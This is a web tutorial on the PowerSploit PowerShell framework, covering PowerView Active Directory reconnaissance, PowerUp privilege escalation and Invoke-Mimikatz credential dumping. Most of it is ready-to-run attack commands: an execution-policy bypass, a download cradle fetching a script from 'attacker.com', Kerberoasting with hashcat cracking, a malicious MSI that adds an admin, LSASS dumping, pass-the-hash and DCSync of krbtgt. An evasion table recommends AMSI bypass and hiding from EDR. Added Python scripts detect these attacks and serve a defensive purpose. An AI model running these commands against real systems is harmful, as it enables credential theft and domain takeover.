
PowerSploit: PowerShell Penetration Testing Guide

Learn PowerSploit for Windows pentesting: PowerView for AD recon, PowerUp for privilege escalation, and Invoke-Mimikatz for credential dumping.


PowerSploit: The PowerShell Penetration Testing Framework

PowerSploit is a collection of Microsoft PowerShell modules designed to assist penetration testers during all phases of an engagement. Originally developed by Matt Graeber and contributors, it remains one of the most referenced frameworks for Windows and Active Directory security testing. Its three pillars — PowerView (AD reconnaissance), PowerUp (privilege escalation), and Invoke-Mimikatz (credential dumping) — cover the core post-exploitation workflow on Windows systems.

Legal notice: PowerSploit must only be used on systems you own or have explicit written authorization to test. Several modules trigger security software and will be flagged in production environments.

Setup and Loading

PowerSploit is available on GitHub. On your attacker machine or test system:

# Clone the repository
git clone https://github.com/PowerShellMafia/PowerSploit.git

# Navigate to the module directory
cd PowerSploit

# Check execution policy (may need to bypass)
Get-ExecutionPolicy

Bypassing Execution Policy

PowerShell’s execution policy prevents unsigned scripts from running by default; it is a usability safeguard rather than a security boundary, which is why a per-process switch is enough to get past it. During authorized assessments, bypass it:

# Per-process bypass (most common, least persistent)
powershell.exe -ExecutionPolicy Bypass -File script.ps1

# In-session bypass
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass

# From command prompt
powershell -ep bypass

In-Memory Loading (AMSI Bypass Consideration)

Loading modules directly from a URL avoids writing to disk:

# Load directly into memory from a hosted location
IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/PowerView.ps1')

# Or use iwr (Invoke-WebRequest)
IEX (iwr http://attacker.com/PowerView.ps1 -UseBasicParsing)

Note: Modern Windows Defender’s AMSI (Antimalware Scan Interface) scans in-memory scripts too. AMSI bypass is a separate topic, but tools like amsi.fail provide updated bypass snippets for lab use.


Part 1: PowerView — Active Directory Reconnaissance

PowerView replaces many AD queries that previously required RSAT tools or admin rights. It works with standard domain user credentials.

Import the Module

Import-Module .\Recon\PowerView.ps1
# Or after IEX loading, functions are available immediately

Domain and Forest Enumeration

# Get domain information
Get-Domain
Get-DomainController

# Get forest information (multi-domain environments)
Get-Forest
Get-ForestDomain

# Get domain trusts
Get-DomainTrust
# Map all trusts in the forest
Get-ForestTrust

User Enumeration

# List all domain users
Get-DomainUser

# Get detailed info on a specific user
Get-DomainUser -Identity jsmith

# Find users with specific attributes
Get-DomainUser -SPN              # Kerberoastable accounts (have SPNs)
Get-DomainUser -AllowDelegation  # Accounts not marked "sensitive and cannot be delegated" (their credentials may be delegated)
Get-DomainUser -AdminCount       # Protected users (AdminSDHolder managed)

# Find users with "password" in description (often contain cleartext passwords)
Get-DomainUser | Where-Object {$_.description -like "*pass*"} | Select samaccountname, description

Group Enumeration

# List all domain groups
Get-DomainGroup

# Get Domain Admin members
Get-DomainGroupMember -Identity "Domain Admins" -Recurse

# Get all groups a user belongs to
Get-DomainGroup -MemberIdentity jsmith

Computer Enumeration

# List all domain computers
Get-DomainComputer

# Find domain controllers
Get-DomainController

# Find computers with unconstrained delegation
Get-DomainComputer -Unconstrained

# Find computers where specific users are logged in
Find-DomainUserLocation -UserName "administrator"
Find-DomainUserLocation -GroupName "Domain Admins"

ACL Enumeration (Critical for Attack Path Mapping)

# Find interesting ACLs for a user (what can jsmith control?)
Find-InterestingDomainAcl -ResolveGUIDs | Where-Object {$_.IdentityReferenceName -match "jsmith"}

# Get all ACLs on a specific object
Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs

# Find GenericAll, GenericWrite, WriteDacl, WriteOwner permissions for current user
Find-InterestingDomainAcl -ResolveGUIDs | Where-Object {
    $_.ActiveDirectoryRights -match "GenericAll|GenericWrite|WriteDacl|WriteOwner" -and
    $_.IdentityReferenceName -notmatch "Domain Admins|Enterprise Admins"
}
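
The filter above tells you which ACEs to look at; the same review can be run offline over exported ACL data. The Python script below is an added example, not part of PowerSploit or this guide: it takes ACEs in the shape Get-DomainObjectAcl returns (sample rows, principal names and DNs are constructed, and ObjectAceType is kept as the raw GUID rather than the resolved name), ignores deny ACEs and principals expected to hold control rights, and reports GenericAll/GenericWrite/WriteDacl/WriteOwner grants plus two extended rights recognised by GUID (User-Force-Change-Password and DS-Replication-Get-Changes-All). The EXPECTED_PRINCIPALS allowlist is an assumption you would tailor to the domain.

```python
# Rights that let their holder take over the target object (the same set the PowerView
# filter in this section searches for), and extended rights worth flagging by their GUID.
TAKEOVER_RIGHTS = {"GenericAll", "GenericWrite", "WriteDacl", "WriteOwner"}
EXTENDED_RIGHTS = {
    "00299570-246d-11d0-a768-00aa006e0529": "User-Force-Change-Password",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}
# Principals expected to hold such rights (assumed allowlist); everything else is a finding.
EXPECTED_PRINCIPALS = {
    "CORP\\Domain Admins", "CORP\\Enterprise Admins",
    "NT AUTHORITY\\SYSTEM", "BUILTIN\\Administrators",
}

# Constructed sample ACEs (invented names and DNs) in the shape Get-DomainObjectAcl returns,
# with ObjectAceType left as the raw GUID so the mapping above can be applied.
SAMPLE_ACES = [
    {"ObjectDN": "CN=Domain Admins,CN=Users,DC=corp,DC=local", "AceType": "AccessAllowed",
     "ActiveDirectoryRights": "GenericAll", "ObjectAceType": None,
     "IdentityReferenceName": "CORP\\Domain Admins"},
    {"ObjectDN": "CN=Domain Admins,CN=Users,DC=corp,DC=local", "AceType": "AccessAllowed",
     "ActiveDirectoryRights": "WriteDacl", "ObjectAceType": None,
     "IdentityReferenceName": "CORP\\helpdesk"},
    {"ObjectDN": "CN=svc_sql,OU=Service,DC=corp,DC=local", "AceType": "AccessAllowed",
     "ActiveDirectoryRights": "ExtendedRight",
     "ObjectAceType": "00299570-246d-11d0-a768-00aa006e0529",
     "IdentityReferenceName": "CORP\\jsmith"},
    {"ObjectDN": "CN=svc_sql,OU=Service,DC=corp,DC=local", "AceType": "AccessAllowed",
     "ActiveDirectoryRights": "ReadProperty, GenericExecute", "ObjectAceType": None,
     "IdentityReferenceName": "CORP\\Domain Users"},
    {"ObjectDN": "DC=corp,DC=local", "AceType": "AccessAllowed",
     "ActiveDirectoryRights": "ExtendedRight",
     "ObjectAceType": "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",
     "IdentityReferenceName": "CORP\\backup_op"},
    {"ObjectDN": "CN=svc_sql,OU=Service,DC=corp,DC=local", "AceType": "AccessDenied",
     "ActiveDirectoryRights": "GenericAll", "ObjectAceType": None,
     "IdentityReferenceName": "CORP\\jsmith"},
]


def classify_ace(ace):
    """Return why an ACE is dangerous, or None if it is a deny ACE, is held by an
    expected principal, or grants nothing that enables object takeover."""
    if ace.get("AceType") != "AccessAllowed":
        return None
    if ace["IdentityReferenceName"] in EXPECTED_PRINCIPALS:
        return None
    # ActiveDirectoryRights is a comma-separated flags string, e.g. "ReadProperty, GenericExecute"
    rights = {r.strip() for r in ace["ActiveDirectoryRights"].split(",")}
    hit = rights & TAKEOVER_RIGHTS
    if hit:
        return "/".join(sorted(hit))
    if "ExtendedRight" in rights:
        guid = (ace.get("ObjectAceType") or "").lower()
        if not guid:
            return "all extended rights"   # ExtendedRight with no ObjectAceType covers every control right
        return EXTENDED_RIGHTS.get(guid)
    return None


def audit_acls(aces):
    """One finding per ACE that classify_ace flags, in input order."""
    findings = []
    for ace in aces:
        reason = classify_ace(ace)
        if reason:
            findings.append({"principal": ace["IdentityReferenceName"],
                             "object": ace["ObjectDN"], "reason": reason})
    return findings


if __name__ == "__main__":
    for f in audit_acls(SAMPLE_ACES):
        print(f"{f['principal']} -> {f['object']}: {f['reason']}")
```

Extend EXTENDED_RIGHTS with further control-access GUIDs as needed; the two listed are the ones most often abused for password resets and DCSync respectively.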

Share Enumeration

# Find shares accessible to the current user
Find-DomainShare -CheckShareAccess

# Find interesting files on accessible shares
Find-InterestingDomainShareFile -Include "*.txt","*.xml","*.config","*.ps1","*.bat"

Kerberoasting with PowerView

# Find Kerberoastable accounts (users with SPNs)
Get-DomainUser -SPN | Select samaccountname, serviceprincipalname

# Request a service ticket for every SPN account and write the TGS hashes in Hashcat format
Invoke-Kerberoast -OutputFormat Hashcat | Select-Object -ExpandProperty Hash | Out-File -Encoding ASCII hashes.txt

Then crack with Hashcat on your attacker machine:

hashcat -m 13100 hashes.txt rockyou.txt --force
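
Every ticket Invoke-Kerberoast requests is recorded on the domain controller as Event ID 4769, and the request pattern (many RC4-HMAC, encryption type 0x17, service tickets for distinct user accounts with SPNs, from one requester within seconds) is what detection keys on. The Python below is an added example written for this guide, not PowerSploit code: it runs that logic over constructed 4769 records (accounts, IPs and timestamps are invented) and flags a requester once it obtains RC4 tickets for at least four distinct SPN accounts inside a 60-second window. Both thresholds are assumptions to tune against the environment's baseline.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample Event ID 4769 records (Kerberos service ticket requested); values invented.
# Field order: TimeCreated, TargetUserName (the requesting account), ServiceName (the
# account holding the SPN), TicketEncryptionType, IpAddress.
SAMPLE_4769 = [
    ("2024-05-01T09:00:01", "jsmith@CORP.LOCAL",    "sql_svc",    "0x17", "10.0.0.25"),
    ("2024-05-01T09:00:01", "jsmith@CORP.LOCAL",    "http_svc",   "0x17", "10.0.0.25"),
    ("2024-05-01T09:00:02", "jsmith@CORP.LOCAL",    "backup_svc", "0x17", "10.0.0.25"),
    ("2024-05-01T09:00:02", "jsmith@CORP.LOCAL",    "iis_app",    "0x17", "10.0.0.25"),
    ("2024-05-01T09:00:03", "jsmith@CORP.LOCAL",    "exch_svc",   "0x17", "10.0.0.25"),
    ("2024-05-01T09:00:03", "jsmith@CORP.LOCAL",    "WS04$",      "0x12", "10.0.0.25"),  # normal ticket to a machine
    ("2024-05-01T09:05:00", "amiller@CORP.LOCAL",   "sql_svc",    "0x12", "10.0.0.31"),  # AES ticket, normal use
    ("2024-05-01T09:06:00", "amiller@CORP.LOCAL",   "http_svc",   "0x12", "10.0.0.31"),
    ("2024-05-01T10:00:00", "legacyapp@CORP.LOCAL", "sql_svc",    "0x17", "10.0.0.40"),  # single RC4 ticket: below threshold
]


def is_roastable_request(service_name, enc_type):
    """True for an RC4-HMAC (0x17) ticket to a user (non-machine, non-krbtgt) account:
    the combination a Kerberoast tool asks for to obtain a crackable TGS."""
    if service_name.endswith("$") or service_name.lower() == "krbtgt":
        return False
    return enc_type.lower() == "0x17"


def detect_kerberoast(events, window_seconds=60, threshold=4):
    """Flag requesting accounts that obtained RC4 tickets for >= threshold distinct SPN
    accounts inside any window of window_seconds. Returns the widest such window per account."""
    by_user = defaultdict(list)
    for ts, user, svc, etype, ip in events:
        if is_roastable_request(svc, etype):
            by_user[user].append((datetime.fromisoformat(ts), svc, ip))

    alerts = []
    for user, reqs in by_user.items():
        reqs.sort()
        best = None
        for i, (t0, _, ip) in enumerate(reqs):
            # Distinct SPN accounts requested from this event forward, within the window
            in_window = {svc for t, svc, _ in reqs[i:]
                         if t - t0 <= timedelta(seconds=window_seconds)}
            if len(in_window) >= threshold and (best is None or len(in_window) > best["distinct_spns"]):
                best = {"user": user, "source_ip": ip, "window_start": t0.isoformat(),
                        "distinct_spns": len(in_window), "services": sorted(in_window)}
        if best is not None:
            alerts.append(best)
    return alerts


if __name__ == "__main__":
    for a in detect_kerberoast(SAMPLE_4769):
        print(f"[ALERT] {a['user']} from {a['source_ip']} requested RC4 tickets for "
              f"{a['distinct_spns']} SPN accounts starting {a['window_start']}: {', '.join(a['services'])}")
```

A domain that still issues RC4 tickets in normal operation will produce baseline hits, so tune the threshold per environment. The durable mitigation is AES-only service accounts with long random passwords (or group managed service accounts), after which any 0x17 request for a service account is itself worth an alert.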

Part 2: PowerUp — Privilege Escalation

PowerUp finds common Windows privilege escalation vectors on the local system.

Import and Run All Checks

Import-Module .\Privesc\PowerUp.ps1

# Run all checks at once
Invoke-AllChecks

Invoke-AllChecks tests for:

  • Unquoted service paths
  • Writable service binary paths
  • Modifiable service registry keys
  • AlwaysInstallElevated registry setting
  • Weak registry permissions
  • DLL hijacking opportunities
  • Scheduled task weaknesses

Key Checks and Exploitation

Unquoted Service Path:

# Find services with unquoted paths containing spaces
Get-UnquotedService

# Automatically exploit (place a malicious binary in the vulnerable path)
Write-ServiceBinary -ServiceName "VulnerableService" -Path "C:\Program Files\Service\evil.exe"
Invoke-ServiceAbuse -ServiceName "VulnerableService"

Writable Service Binary:

# Find services where the binary path is writable
Get-ModifiableServiceFile

# Exploit by replacing the binary
Install-ServiceBinary -ServiceName "WriteableService"

AlwaysInstallElevated:

# Check if enabled (both HKLM and HKCU must be 1)
Get-RegistryAlwaysInstallElevated

# If enabled, create a malicious MSI and install it as SYSTEM
Write-UserAddMSI    # Creates an MSI that adds a local admin user

Modifiable Registry AutoRuns:

# Find registry auto-run entries pointing to writable locations
Get-ModifiableRegistryAutoRun

# Shows paths you can replace with a malicious binary
# Replacement runs next time the associated user logs in
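
The unquoted-path check that Get-UnquotedService performs is simple enough to reproduce for an audit of exported service configuration, and the fix (quote the ImagePath) is equally mechanical. The Python below is an added example, not PowerUp code: given constructed ImagePath values in the form found under HKLM\SYSTEM\CurrentControlSet\Services\<name>\ImagePath (service names and paths are invented), it reports, for each unquoted path containing spaces, the directories whose ACLs must prevent standard users from creating files, and produces the corrected quoted value.

```python
import re

# Constructed sample ImagePath values (invented names and paths), as they would appear
# under HKLM\SYSTEM\CurrentControlSet\Services\<name>\ImagePath.
SAMPLE_SERVICES = {
    "GoodSvc":    '"C:\\Program Files\\Vendor App\\svc.exe" -run',
    "BadSvc":     'C:\\Program Files\\Vendor App\\Sub Dir\\svc.exe -run',
    "SysSvc":     'C:\\Windows\\system32\\svchost.exe -k netsvcs',
    "NoSpaceSvc": 'C:\\Tools\\agent.exe',
    "DriverSvc":  '\\SystemRoot\\System32\\drivers\\acpi.sys',
}

# Everything up to the first ".exe" is taken as the executable path; arguments follow it.
_EXE = re.compile(r"(?i)^(.*?\.exe)")


def unquoted_path_dirs(image_path):
    """If image_path is unquoted and the executable's path contains spaces, return the
    directories (in the order CreateProcess would probe them) in which a file named after
    a path prefix would be run instead of the intended binary. Returns [] when the path is
    quoted, space-free, or not an absolute drive path."""
    p = image_path.strip()
    if p.startswith('"') or not re.match(r"^[A-Za-z]:\\", p):
        return []
    m = _EXE.match(p)
    if not m:
        return []
    exe_path = m.group(1)
    dirs = []
    for i, ch in enumerate(exe_path):
        if ch == " ":
            # CreateProcess tries the prefix up to this space (with .exe appended);
            # the directory holding that prefix is the one whose ACL matters.
            parent = exe_path[:i].rsplit("\\", 1)[0] + "\\"
            if parent not in dirs:
                dirs.append(parent)
    return dirs


def quote_image_path(image_path):
    """Return the remediated ImagePath: executable path in double quotes, arguments kept."""
    p = image_path.strip()
    m = _EXE.match(p)
    if p.startswith('"') or not m:
        return p
    exe_path = m.group(1)
    return f'"{exe_path}"' + p[len(exe_path):]


def audit_services(services):
    """Map each affected service name to the directories that must not be writable by standard users."""
    findings = {}
    for name, path in services.items():
        dirs = unquoted_path_dirs(path)
        if dirs:
            findings[name] = dirs
    return findings


if __name__ == "__main__":
    for name, dirs in audit_services(SAMPLE_SERVICES).items():
        print(f"{name}: unquoted path with spaces; verify ACLs on {dirs}")
        print(f"  fix: set ImagePath to {quote_image_path(SAMPLE_SERVICES[name])}")
```

The check only flags what the service control manager would misparse; whether the finding is exploitable still depends on a standard user being able to write to one of the listed directories, which is the second half of what Get-UnquotedService reports and what the ACL review must confirm.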

Part 3: Invoke-Mimikatz — Credential Dumping

PowerSploit’s Invoke-Mimikatz is a PowerShell script that reflectively loads the Mimikatz binary into memory, so the Mimikatz executable itself never touches disk.

Basic Credential Dump (Requires Local Admin)

Import-Module .\Exfiltration\Invoke-Mimikatz.ps1

# Dump all credentials from LSASS
Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"'

Output includes:

  • NTLM hashes for all logged-in users
  • Cleartext passwords (if WDigest is enabled or on older systems)
  • Kerberos tickets

Remote Credential Dumping

# Dump credentials from a remote machine (requires admin on target)
Invoke-Mimikatz -ComputerName dc01.domain.local

# Dump from multiple machines
"server01","server02","dc01" | ForEach-Object { Invoke-Mimikatz -ComputerName $_ }

Pass-the-Hash with Invoke-Mimikatz

# Inject an NTLM hash to impersonate a user
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:domain.local /ntlm:HASH_HERE /run:powershell.exe"'

This opens a new PowerShell window running as Administrator using only the NTLM hash — no plaintext password required.

DCSync via Invoke-Mimikatz

# Replicate all domain credentials (requires DA or DCSync rights)
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:domain.local /all /csv"'

# Single account
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:domain.local /user:krbtgt"'
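
DCSync leaves a distinct trace: with "Audit Directory Service Access" enabled, the domain controller logs Event ID 4662 whose Properties field lists the replication control-access GUIDs, and the subject is a user account rather than a domain controller's machine account. The Python below is an added example, not part of PowerSploit: it scans constructed 4662 records (account names are invented; the MSOL_ prefix stands for the Azure AD Connect account, which legitimately replicates) and flags replication rights exercised by anything outside the DC list or the allowlist.

```python
import re

# Control-access right GUIDs that grant directory replication. A 4662 event whose
# Properties field lists one of these, from an account that is neither a domain
# controller nor a known sync service, is the standard indicator of DCSync.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

GUID_RX = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.IGNORECASE)

# Constructed sample 4662 records (invented accounts). Properties holds the access type
# followed by GUIDs, as Windows writes it; the second GUID in the replication events is
# the domainDNS object class, the one in the last event is the user object class.
SAMPLE_4662 = [
    {"SubjectDomainName": "CORP", "SubjectUserName": "DC02$", "AccessMask": "0x100",
     "Properties": "Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
                   "{19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"SubjectDomainName": "CORP", "SubjectUserName": "jsmith", "AccessMask": "0x100",
     "Properties": "Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"SubjectDomainName": "CORP", "SubjectUserName": "MSOL_1a2b3c", "AccessMask": "0x100",
     "Properties": "Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"SubjectDomainName": "CORP", "SubjectUserName": "jsmith", "AccessMask": "0x10",
     "Properties": "Read Property {bf967aba-0de6-11d0-a285-00aa003049e2}"},
]


def replication_rights_in(properties):
    """Names of the replication control-access rights referenced in a 4662 Properties field."""
    return [REPLICATION_RIGHTS[g.lower()] for g in GUID_RX.findall(properties)
            if g.lower() in REPLICATION_RIGHTS]


def detect_dcsync(events, domain_controllers, allowlist=()):
    """Flag 4662 events in which a non-DC, non-allowlisted account exercised replication rights.
    domain_controllers: DC machine account names such as 'DC01$'.
    allowlist: account-name prefixes that replicate by design (e.g. 'MSOL_' for Azure AD Connect)."""
    dcs = {dc.upper() for dc in domain_controllers}
    alerts = []
    for ev in events:
        rights = replication_rights_in(ev.get("Properties", ""))
        if not rights:
            continue
        subject = ev["SubjectUserName"]
        if subject.upper() in dcs:
            continue  # DC-to-DC replication is expected
        if any(subject.upper().startswith(p.upper()) for p in allowlist):
            continue
        alerts.append({"subject": f"{ev['SubjectDomainName']}\\{subject}",
                       "rights": rights, "access_mask": ev.get("AccessMask")})
    return alerts


if __name__ == "__main__":
    for a in detect_dcsync(SAMPLE_4662, {"DC01$", "DC02$"}, allowlist=("MSOL_",)):
        print(f"[ALERT] possible DCSync by {a['subject']}: {', '.join(a['rights'])}")
```

Keep the allowlist short and reviewed: an allowlisted prefix is exactly the account an attacker would target to replicate quietly, so its logons and source hosts deserve their own baseline.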

Operational Security Considerations

Risk                              Mitigation
--------------------------------  ------------------------------------------------------------------------------
AMSI detection of scripts         Use AMSI bypass before loading; obfuscate strings
EDR flagging Invoke-Mimikatz      Use direct LSASS dump alternatives (ProcDump, comsvcs.dll)
Windows Defender signatures       Load from memory, avoid writing to disk
PowerShell Script Block Logging   Logged in Event ID 4104 — assume all commands are logged
Constrained Language Mode         Some environments restrict PowerShell — use CLM bypass or compiled C# alternatives
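
Both the in-memory loading section earlier and the Script Block Logging row above come down to the same defender fact: with script block logging enabled, the decoded content of every block, including IEX download cradles and the PowerView, PowerUp and Invoke-Mimikatz function names, lands in Event ID 4104 whether or not the script ever touched disk. The Python below is an added example, not code from PowerSploit or this guide: it scans constructed 4104 records (hosts, users and script text are invented and echo commands from this page) against an indicator list grouped by workflow stage and returns a severity-tagged alert per hit. The indicator regexes and severity levels are assumptions to extend for your environment.

```python
import re

# Constructed sample Event ID 4104 (PowerShell script block logging) records; the text
# values mirror commands from this guide and were not captured from a real system.
SAMPLE_4104 = [
    {"EventID": 4104, "Computer": "WS01", "User": "CORP\\jsmith",
     "ScriptBlockText": "Get-ChildItem C:\\Users\\jsmith\\Documents"},
    {"EventID": 4104, "Computer": "WS01", "User": "CORP\\jsmith",
     "ScriptBlockText": "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/PowerView.ps1')"},
    {"EventID": 4104, "Computer": "WS01", "User": "CORP\\jsmith",
     "ScriptBlockText": "Get-DomainUser -SPN | Select samaccountname, serviceprincipalname"},
    {"EventID": 4104, "Computer": "SRV02", "User": "CORP\\svc_backup",
     "ScriptBlockText": "Invoke-Mimikatz -Command '\"sekurlsa::logonpasswords\"'"},
    {"EventID": 4104, "Computer": "WS03", "User": "CORP\\admin1",
     "ScriptBlockText": "Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass"},
    {"EventID": 4103, "Computer": "WS03", "User": "CORP\\admin1",
     "ScriptBlockText": "Invoke-AllChecks"},   # different event ID: not a script block record
]

# Indicator regexes keyed by the stage of the PowerSploit workflow they correspond to.
INDICATORS = {
    "policy_bypass":   re.compile(r"(?i)-(?:ExecutionPolicy|ep)\s+Bypass\b"),
    "download_cradle": re.compile(r"(?i)\b(?:IEX|Invoke-Expression)\b.*\b(?:DownloadString|Invoke-WebRequest|iwr)\b"),
    "powerview":       re.compile(r"(?i)\b(?:Get-Domain(?:User|Computer|Group|Trust|Controller|ObjectAcl)|"
                                  r"Find-(?:InterestingDomainAcl|DomainShare|DomainUserLocation)|Invoke-Kerberoast)\b"),
    "powerup":         re.compile(r"(?i)\b(?:Invoke-AllChecks|Get-UnquotedService|Get-ModifiableServiceFile|"
                                  r"Write-ServiceBinary|Invoke-ServiceAbuse|Write-UserAddMSI)\b"),
    "mimikatz":        re.compile(r"(?i)(?:\bInvoke-Mimikatz\b|sekurlsa::|lsadump::)"),
}
# Assumed severity levels: 1 = low ... 4 = critical
SEVERITY = {"policy_bypass": 1, "download_cradle": 2, "powerview": 2, "powerup": 3, "mimikatz": 4}
SEVERITY_NAME = {1: "low", 2: "medium", 3: "high", 4: "critical"}
NAME_TO_LEVEL = {v: k for k, v in SEVERITY_NAME.items()}


def classify_script_block(text):
    """Return the indicator names matched by one script block, in INDICATORS order."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def scan_4104(events):
    """Return one alert per 4104 event that matches an indicator, tagged with its worst severity."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4104:
            continue
        hits = classify_script_block(ev.get("ScriptBlockText", ""))
        if not hits:
            continue
        worst = max(SEVERITY[h] for h in hits)
        alerts.append({"computer": ev["Computer"], "user": ev["User"],
                       "indicators": hits, "severity": SEVERITY_NAME[worst]})
    return alerts


def users_by_severity(alerts, minimum="high"):
    """Distinct users with at least one alert at or above the given severity name."""
    floor = NAME_TO_LEVEL[minimum]
    return sorted({a["user"] for a in alerts if NAME_TO_LEVEL[a["severity"]] >= floor})


if __name__ == "__main__":
    found = scan_4104(SAMPLE_4104)
    for a in found:
        print(f"[{a['severity'].upper()}] {a['computer']} {a['user']}: {', '.join(a['indicators'])}")
    print("users needing triage:", users_by_severity(found))
```

String matching like this is defeated by the obfuscation the table's first row recommends, but the logging itself is not: pair it with a volume or entropy check on 4104 text, and note that 4104 records the block as it reached the engine, so obfuscated layers are logged again each time they are decoded and executed.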

PowerSploit Quick Reference

# AD Recon
Get-DomainUser -SPN                          # Kerberoastable users
Get-DomainComputer -Unconstrained            # Unconstrained delegation
Find-DomainUserLocation -GroupName "Domain Admins"  # Where DAs are logged in
Find-InterestingDomainAcl -ResolveGUIDs      # Interesting permissions

# Privilege Escalation
Invoke-AllChecks                             # Run all PowerUp checks
Get-UnquotedService                          # Unquoted paths
Get-ModifiableServiceFile                    # Writable service binaries

# Credential Dumping
Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"'   # Local dump
Invoke-Mimikatz -Command '"lsadump::dcsync /user:krbtgt"' # DCSync

Summary

PowerSploit’s three core modules cover the post-exploitation trifecta in Windows environments: PowerView maps the AD attack surface, revealing trust relationships, Kerberoastable accounts, and ACL misconfigurations; PowerUp surfaces local privilege escalation vectors that take you from standard user to SYSTEM; and Invoke-Mimikatz harvests credentials to enable lateral movement and domain takeover. Together, they form a complete PowerShell-native toolkit for authorized Windows penetration testing engagements.

#privilege-escalation #powerup #powerview #powershell #powersploit